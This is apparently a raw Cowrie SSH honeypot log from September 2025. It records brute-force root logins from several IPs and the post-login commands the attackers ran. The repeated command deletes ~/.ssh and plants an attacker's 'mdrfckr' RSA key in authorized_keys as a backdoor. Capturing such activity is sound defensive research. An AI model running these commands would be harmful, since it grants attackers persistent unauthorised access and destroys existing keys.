{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.332124Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.348374Z","src_ip":"182.18.161.165","session":"0b9ac2a58453"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:33:47.487697Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.488509Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.605330Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.606208Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":37912,"dst_ip":"1.2.3.4","dst_port":22,"session":"37e8ff94390a","protocol":"ssh","message":"New connection: 93.113.63.124:37912 (1.2.3.4:22) [session: 37e8ff94390a]","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.676059Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.677236Z","src_ip":"93.113.63.124","session":"37e8ff94390a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:47.737174Z","src_ip":"93.113.63.124","session":"37e8ff94390a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:33:48.015702Z","src_ip":"93.113.63.124","session":"37e8ff94390a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:49.124247Z","src_ip":"93.113.63.124","session":"37e8ff94390a"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":37926,"dst_ip":"1.2.3.4","dst_port":22,"session":"59c0a6a405ef","protocol":"ssh","message":"New connection: 93.113.63.124:37926 (1.2.3.4:22) [session: 59c0a6a405ef]","sensor":"my-vps","timestamp":"2025-09-08T23:33:49.205684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:33:49.206502Z","src_ip":"93.113.63.124","session":"59c0a6a405ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:33:49.278177Z","src_ip":"93.113.63.124","session":"59c0a6a405ef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:33:49.688635Z","src_ip":"93.113.63.124","session":"59c0a6a405ef"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:49.763836Z","src_ip":"93.113.63.124","session":"59c0a6a405ef"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:49.764715Z","src_ip":"93.113.63.124","session":"daddf6f0e06a"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":41444,"dst_ip":"1.2.3.4","dst_port":22,"session":"4253ca4900ba","protocol":"ssh","message":"New connection: 46.101.8.63:41444 (1.2.3.4:22) [session: 4253ca4900ba]","sensor":"my-vps","timestamp":"2025-09-08T23:34:11.879164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:34:11.879822Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:34:11.903163Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.038735Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:34:12.144539Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.145216Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.146451Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.171123Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:34:12.232152Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.232859Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.258473Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.259318Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":41706,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d002d686b5c","protocol":"ssh","message":"New connection: 46.101.8.63:41706 (1.2.3.4:22) [session: 8d002d686b5c]","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.280644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.281399Z","src_ip":"46.101.8.63","session":"8d002d686b5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.304524Z","src_ip":"46.101.8.63","session":"8d002d686b5c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:34:12.438580Z","src_ip":"46.101.8.63","session":"8d002d686b5c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:13.464012Z","src_ip":"46.101.8.63","session":"8d002d686b5c"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":42370,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9a174400af2","protocol":"ssh","message":"New connection: 46.101.8.63:42370 (1.2.3.4:22) [session: e9a174400af2]","sensor":"my-vps","timestamp":"2025-09-08T23:34:13.483197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:34:13.483954Z","src_ip":"46.101.8.63","session":"e9a174400af2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:34:13.504405Z","src_ip":"46.101.8.63","session":"e9a174400af2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:34:13.628947Z","src_ip":"46.101.8.63","session":"e9a174400af2"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:13.650688Z","src_ip":"46.101.8.63","session":"e9a174400af2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:13.651482Z","src_ip":"46.101.8.63","session":"4253ca4900ba"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":50362,"dst_ip":"1.2.3.4","dst_port":22,"session":"07ac34bb4d17","protocol":"ssh","message":"New connection: 3.131.215.38:50362 (1.2.3.4:22) [session: 07ac34bb4d17]","sensor":"my-vps","timestamp":"2025-09-08T23:34:20.513328Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003di","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003di","sensor":"my-vps","timestamp":"2025-09-08T23:34:20.514393Z","src_ip":"3.131.215.38","session":"07ac34bb4d17"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:20.515323Z","src_ip":"3.131.215.38","session":"07ac34bb4d17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48000,"dst_ip":"1.2.3.4","dst_port":22,"session":"b20ba28386e6","protocol":"ssh","message":"New connection: 212.227.235.229:48000 (1.2.3.4:22) [session: b20ba28386e6]","sensor":"my-vps","timestamp":"2025-09-08T23:34:45.247797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:34:45.248474Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:34:45.560902Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.login.success","username":"root","password":"shenhua","message":"login attempt [root/shenhua] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:34:46.860014Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:34:47.709240Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:34:47.709930Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:34:47.710978Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:34:48.025008Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:34:48.722350Z","src_ip":"212.227.235.229","session":"b20ba28386e6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 